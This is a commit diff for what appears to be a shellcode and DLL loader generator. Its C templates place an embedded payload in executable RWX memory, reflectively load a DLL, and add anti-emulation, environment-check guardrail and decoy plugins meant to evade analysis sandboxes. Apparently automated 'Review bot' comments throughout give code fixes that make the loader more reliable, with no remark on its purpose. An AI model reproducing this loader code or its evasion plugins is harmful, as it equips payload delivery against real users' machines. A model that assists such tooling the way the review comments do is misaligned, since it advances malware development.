refactor: fix carrier & templates (modularize)
@@ -17,28 +17,25 @@ char *supermega_payload;
|
||||
|
||||
{{plugin_antiemulation}}
|
||||
|
||||
{{plugin_decoy}}
|
||||
|
||||
{{plugin_executionguardrail}}
|
||||
|
||||
|
||||
int main()
|
||||
{
|
||||
// Execution Guardrail: Env Check
|
||||
wchar_t envVarName[] = L"USERPROFILE";
|
||||
wchar_t tocheck[] = L"C:\\Users\\";
|
||||
WCHAR buffer[1024]; // NOTE: Do not make it bigger, or we have a __chkstack() dependency!
|
||||
DWORD result = GetEnvironmentVariableW(envVarName, buffer, 1024);
|
||||
if (result == 0) {
|
||||
return 6;
|
||||
}
|
||||
if (mystrcmp(buffer, tocheck) != 0) {
|
||||
return 6;
|
||||
DWORD result;
|
||||
|
||||
// Call: Execution Guardrail
|
||||
if (executionguardrail() != 0) {
|
||||
return 1;
|
||||
}
|
||||
|
||||
// Depends on plugin_antiemulation
|
||||
// Call: Anti Emulation plugin
|
||||
antiemulation();
|
||||
|
||||
// Decoy
|
||||
{{plugin_decoy}}
|
||||
|
||||
//WinExec("C:\\windows\\system32\\notepad.exe", 1);
|
||||
// Call: Decoy plugin
|
||||
decoy();
|
||||
|
||||
// Allocate 1
|
||||
// char *dest = ...
|
||||
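Review bot: `DWORD result;` at the top of main() has lost its only visible user, the GetEnvironmentVariableW call that moved into executionguardrail(); if nothing below the hunk reads it, the declaration is dead and should go (the same declaration survives in the main() hunks headed `@@ -20,11 +25,18 @@` and `@@ -15,11 +15,29 @@`). In the `@@ -20,11 +25,18 @@` hunk the comment `// Depends on plugin_antiemulation` now sits above that declaration instead of the antiemulation() call it describes; move it next to `// Call: Anti Emulation plugin`. If the `{{plugin_decoy}}` placeholder inside main() survives on the new side beside the `decoy();` call, it expands to the whole `void decoy() {...}` definition from the decoy plugin inside the function body, which is not valid C; only the top-level placeholder should remain. main() continues past the end of the hunk.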
@@ -62,13 +59,3 @@ int main()
|
||||
return 0;
|
||||
}
|
||||
|
||||
int mystrcmp(wchar_t* str1, wchar_t* str2) {
|
||||
int i = 0;
|
||||
while (str1[i] != L'\0' && str2[i] != L'\0') {
|
||||
if (str1[i] != str2[i]) {
|
||||
return 1;
|
||||
}
|
||||
i++;
|
||||
}
|
||||
return 0;
|
||||
}
|
||||
|
||||
@@ -11,6 +11,11 @@ char *supermega_payload;
|
||||
|
||||
{{plugin_antiemulation}}
|
||||
|
||||
{{plugin_decoy}}
|
||||
|
||||
{{plugin_executionguardrail}}
|
||||
|
||||
|
||||
/* iat_reuse_rx
|
||||
|
||||
Standard IAT reuse shellcode
|
||||
@@ -20,11 +25,18 @@ char *supermega_payload;
|
||||
|
||||
int main()
|
||||
{
|
||||
// Depends on plugin_antiemulation
|
||||
DWORD result;
|
||||
|
||||
// Call: Execution Guardrail
|
||||
if (executionguardrail() != 0) {
|
||||
return 1;
|
||||
}
|
||||
|
||||
// Call: Anti Emulation plugin
|
||||
antiemulation();
|
||||
|
||||
// Decoy
|
||||
{{plugin_decoy}}
|
||||
// Call: Decoy plugin
|
||||
decoy();
|
||||
|
||||
// Allocate 1
|
||||
// char *dest = ...
|
||||
@@ -48,13 +60,3 @@ int main()
|
||||
return 0;
|
||||
}
|
||||
|
||||
int mystrcmp(wchar_t* str1, wchar_t* str2) {
|
||||
int i = 0;
|
||||
while (str1[i] != L'\0' && str2[i] != L'\0') {
|
||||
if (str1[i] != str2[i]) {
|
||||
return 1;
|
||||
}
|
||||
i++;
|
||||
}
|
||||
return 0;
|
||||
}
|
||||
|
||||
@@ -15,11 +15,29 @@ char *supermega_payload;
|
||||
* does (rw/rx) -> rwx -> rx
|
||||
*/
|
||||
|
||||
{{plugin_antiemulation}}
|
||||
|
||||
{{plugin_decoy}}
|
||||
|
||||
{{plugin_executionguardrail}}
|
||||
|
||||
|
||||
int main()
|
||||
{
|
||||
DWORD result;
|
||||
char *dest = supermega_payload;
|
||||
|
||||
// Call: Execution Guardrail
|
||||
if (executionguardrail() != 0) {
|
||||
return 1;
|
||||
}
|
||||
|
||||
// Call: Anti Emulation plugin
|
||||
antiemulation();
|
||||
|
||||
// Call: Decoy plugin
|
||||
decoy();
|
||||
|
||||
// Note: RWX if carrier and payload are on the same page (or we cant exec copy..)
|
||||
// can do only RW otherwise?
|
||||
for(int n=0; n<({{PAYLOAD_LEN}}/4096)+1; n++) {
|
||||
|
||||
@@ -143,9 +143,29 @@ DWORD_PTR load_dll(LPVOID dllBytes, DWORD_PTR *ret_dllBase, DWORD *ret_aoep) {
|
||||
}
|
||||
|
||||
|
||||
{{plugin_antiemulation}}
|
||||
|
||||
{{plugin_decoy}}
|
||||
|
||||
{{plugin_executionguardrail}}
|
||||
|
||||
|
||||
int main()
|
||||
{
|
||||
char* dest = VirtualAlloc(0, {{PAYLOAD_LEN}}, 0x3000, PAGE_EXECUTE_READWRITE);
|
||||
char* dest = NULL;
|
||||
|
||||
// Call: Execution Guardrail
|
||||
if (executionguardrail() != 0) {
|
||||
return 1;
|
||||
}
|
||||
|
||||
// Call: Anti Emulation plugin
|
||||
antiemulation();
|
||||
|
||||
// Call: Decoy plugin
|
||||
decoy();
|
||||
|
||||
dest = VirtualAlloc(0, {{PAYLOAD_LEN}}, 0x3000, PAGE_EXECUTE_READWRITE);
|
||||
|
||||
// FROM supermega_payload[]
|
||||
// TO dest[]
|
||||
|
||||
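Review bot: `dest = VirtualAlloc(0, {{PAYLOAD_LEN}}, 0x3000, PAGE_EXECUTE_READWRITE);` is not checked for NULL before the copy into `dest[]` that the following comments announce, so an allocation failure turns into a write through a null pointer; add `if (dest == NULL) { return 1; }` directly after the call. The literal `0x3000` hides its intent and would read better as `MEM_COMMIT | MEM_RESERVE`, or at least carry a comment `// 0x3000 = MEM_COMMIT | MEM_RESERVE`. The copy itself lies outside the hunk, and main() continues past its end.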
@@ -122,8 +122,6 @@ DWORD_PTR load_dll(LPVOID dllBase, DWORD_PTR *ret_dllBase, DWORD *ret_aoep) {
|
||||
for (DWORD i = 0; i < relocationsCount; i++)
|
||||
{
|
||||
relocationsProcessed += sizeof(BASE_RELOCATION_ENTRY);
|
||||
|
||||
// THIZ
|
||||
if (relocationEntries[i].Type == 0)
|
||||
{
|
||||
continue;
|
||||
@@ -134,15 +132,11 @@ DWORD_PTR load_dll(LPVOID dllBase, DWORD_PTR *ret_dllBase, DWORD *ret_aoep) {
|
||||
//ReadProcessMemory(GetCurrentProcess(), (LPCVOID)((DWORD_PTR)dllBase + relocationRVA), &addressToPatch, sizeof(DWORD_PTR), NULL);
|
||||
DWORD_PTR* addressToPatch = (DWORD_PTR*)((BYTE*)dllBase + relocationRVA);
|
||||
//DWORD_PTR value = *addressToPatch;
|
||||
|
||||
*addressToPatch += deltaImageBase;
|
||||
//mymemcpy((PVOID)((DWORD_PTR)dllBase + relocationRVA), &addressToPatch, sizeof(DWORD_PTR));
|
||||
|
||||
}
|
||||
}
|
||||
|
||||
MessageBoxW(0, L"AAA2", L"AAA2", MB_OK);
|
||||
|
||||
// resolve import address table
|
||||
PIMAGE_IMPORT_DESCRIPTOR importDescriptor = NULL;
|
||||
IMAGE_DATA_DIRECTORY importsDirectory = ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT];
|
||||
@@ -187,26 +181,35 @@ DWORD_PTR load_dll(LPVOID dllBase, DWORD_PTR *ret_dllBase, DWORD *ret_aoep) {
|
||||
}
|
||||
|
||||
|
||||
{{plugin_antiemulation}}
|
||||
|
||||
{{plugin_decoy}}
|
||||
|
||||
{{plugin_executionguardrail}}
|
||||
|
||||
|
||||
int main()
|
||||
{
|
||||
// char* dest = VirtualAlloc(0, {{PAYLOAD_LEN}}, 0x3000, PAGE_EXECUTE_READWRITE);
|
||||
//char* dest = VirtualAlloc(0, 0x7000, 0x3000, PAGE_EXECUTE_READWRITE);
|
||||
char* dest = supermega_payload;
|
||||
DWORD protect, oldProtect;
|
||||
protect = PAGE_EXECUTE_READWRITE;
|
||||
VirtualProtect((LPVOID)dest, 0x7000, protect, &oldProtect);
|
||||
|
||||
MessageBoxW(0, L"ok virtualprotect", L"AAA2", MB_OK);
|
||||
// Call: Execution Guardrail
|
||||
if (executionguardrail() != 0) {
|
||||
return 1;
|
||||
}
|
||||
|
||||
// Call: Anti Emulation plugin
|
||||
antiemulation();
|
||||
|
||||
// Call: Decoy plugin
|
||||
decoy();
|
||||
|
||||
VirtualProtect((LPVOID)dest, 0x7000, PAGE_EXECUTE_READWRITE, &oldProtect);
|
||||
|
||||
// FROM supermega_payload[]
|
||||
// TO dest[]
|
||||
// Including decryption
|
||||
{{ plugin_decoder }}
|
||||
|
||||
|
||||
MessageBoxW(0, L"ok copy", L"AAA2", MB_OK);
|
||||
|
||||
{{ plugin_decoder }}
|
||||
|
||||
// Load the DLL at dest
|
||||
DWORD_PTR dllBase;
|
||||
|
||||
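Review bot: `VirtualProtect((LPVOID)dest, 0x7000, PAGE_EXECUTE_READWRITE, &oldProtect);` hard-codes the region size while every other template in this commit sizes the payload with `{{PAYLOAD_LEN}}`; if the payload is larger than 0x7000 its tail is not covered, and if it is smaller the call reaches into unrelated pages. Use the placeholder and check the BOOL result, e.g. `if (!VirtualProtect((LPVOID)dest, {{PAYLOAD_LEN}}, PAGE_EXECUTE_READWRITE, &oldProtect)) { return 1; }`. Which of the two `{{ plugin_decoder }}` occurrences is on the new side is not recoverable from the rendered hunk, so please confirm only one remains. main() continues past the end of the hunk.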
@@ -0,0 +1,4 @@
|
||||
|
||||
void decoy() {
|
||||
// None
|
||||
}
|
||||
@@ -1 +1,4 @@
|
||||
WinExec("C:\\windows\\system32\\notepad.exe", 1);
|
||||
|
||||
void decoy() {
|
||||
WinExec("C:\\windows\\system32\\notepad.exe", 1);
|
||||
}
|
||||
|
||||
@@ -1,3 +1,18 @@
|
||||
|
||||
|
||||
int mystrcmp(wchar_t* str1, wchar_t* str2) {
|
||||
int i = 0;
|
||||
while (str1[i] != L'\0' && str2[i] != L'\0') {
|
||||
if (str1[i] != str2[i]) {
|
||||
return 1;
|
||||
}
|
||||
i++;
|
||||
}
|
||||
return 0;
|
||||
}
|
||||
|
||||
|
||||
int executionguardrail() {
|
||||
// Execution Guardrail: Env Check
|
||||
wchar_t envVarName[] = L"USERPROFILE";
|
||||
wchar_t tocheck[] = L"C:\\Users\\";
|
||||
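Review bot: `mystrcmp` returns 0 as soon as either string ends, so it reports a match when one argument is merely a prefix of the other; that is what the guardrail relies on (`tocheck` is a prefix of the profile path), but the name promises strcmp semantics. A one-line contract above the definition saves the next reader a surprise: `// Prefix test, not strcmp: returns 0 when both strings agree up to the end of the shorter one.` Neither parameter is written through, so `const wchar_t *` fits, and `int executionguardrail()` should be `int executionguardrail(void)` so the empty parameter list is a prototype rather than an unspecified one. executionguardrail() continues past the end of the hunk.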
@@ -8,4 +23,7 @@
|
||||
}
|
||||
if (mystrcmp(buffer, tocheck) != 0) {
|
||||
return 6;
|
||||
}
|
||||
}
|
||||
return 0;
|
||||
}
|
||||
|
||||
|
||||
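Review bot: The brace count on the new side looks off by one: the visible openers after `int executionguardrail() {` are the two `if` blocks, yet this hunk closes four braces (`}` after `return 6;`, then `}`, `return 0;`, `}`), which would leave `return 0;` outside the function and a stray `}` behind it. That holds unless a block opened in the lines between the two hunks balances it, which I cannot see; if it does not, drop the `}` that directly precedes `return 0;`. The start of executionguardrail() is in the previous hunk.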
@@ -0,0 +1,3 @@
|
||||
int executionguardrail() {
|
||||
// None
|
||||
}
|
||||
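Review bot: `int executionguardrail() { // None }` falls off the end without a return statement, and every carrier template evaluates `executionguardrail() != 0`, so this no-op variant yields an indeterminate value (undefined behaviour in C) and the guard may pass or fail arbitrarily between builds. Add `return 0;` before the closing brace so "no guardrail" reliably means "proceed". Writing the parameter list as `(void)` would also make it a proper prototype.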
+1
-1
@@ -67,7 +67,7 @@ def create_c_from_template(settings: Settings, payload_len: int):
|
||||
'plugin_decoder': plugin_decoder,
|
||||
'plugin_antiemulation': plugin_antiemualation,
|
||||
'plugin_decoy': plugin_decoy,
|
||||
'plugin_guardrails': plugin_guardrails,
|
||||
'plugin_executionguardrail': plugin_guardrails,
|
||||
'PAYLOAD_LEN': payload_len,
|
||||
})
|
||||
with open(settings.main_c_path, "w", encoding='utf-8') as file:
|
||||
|
||||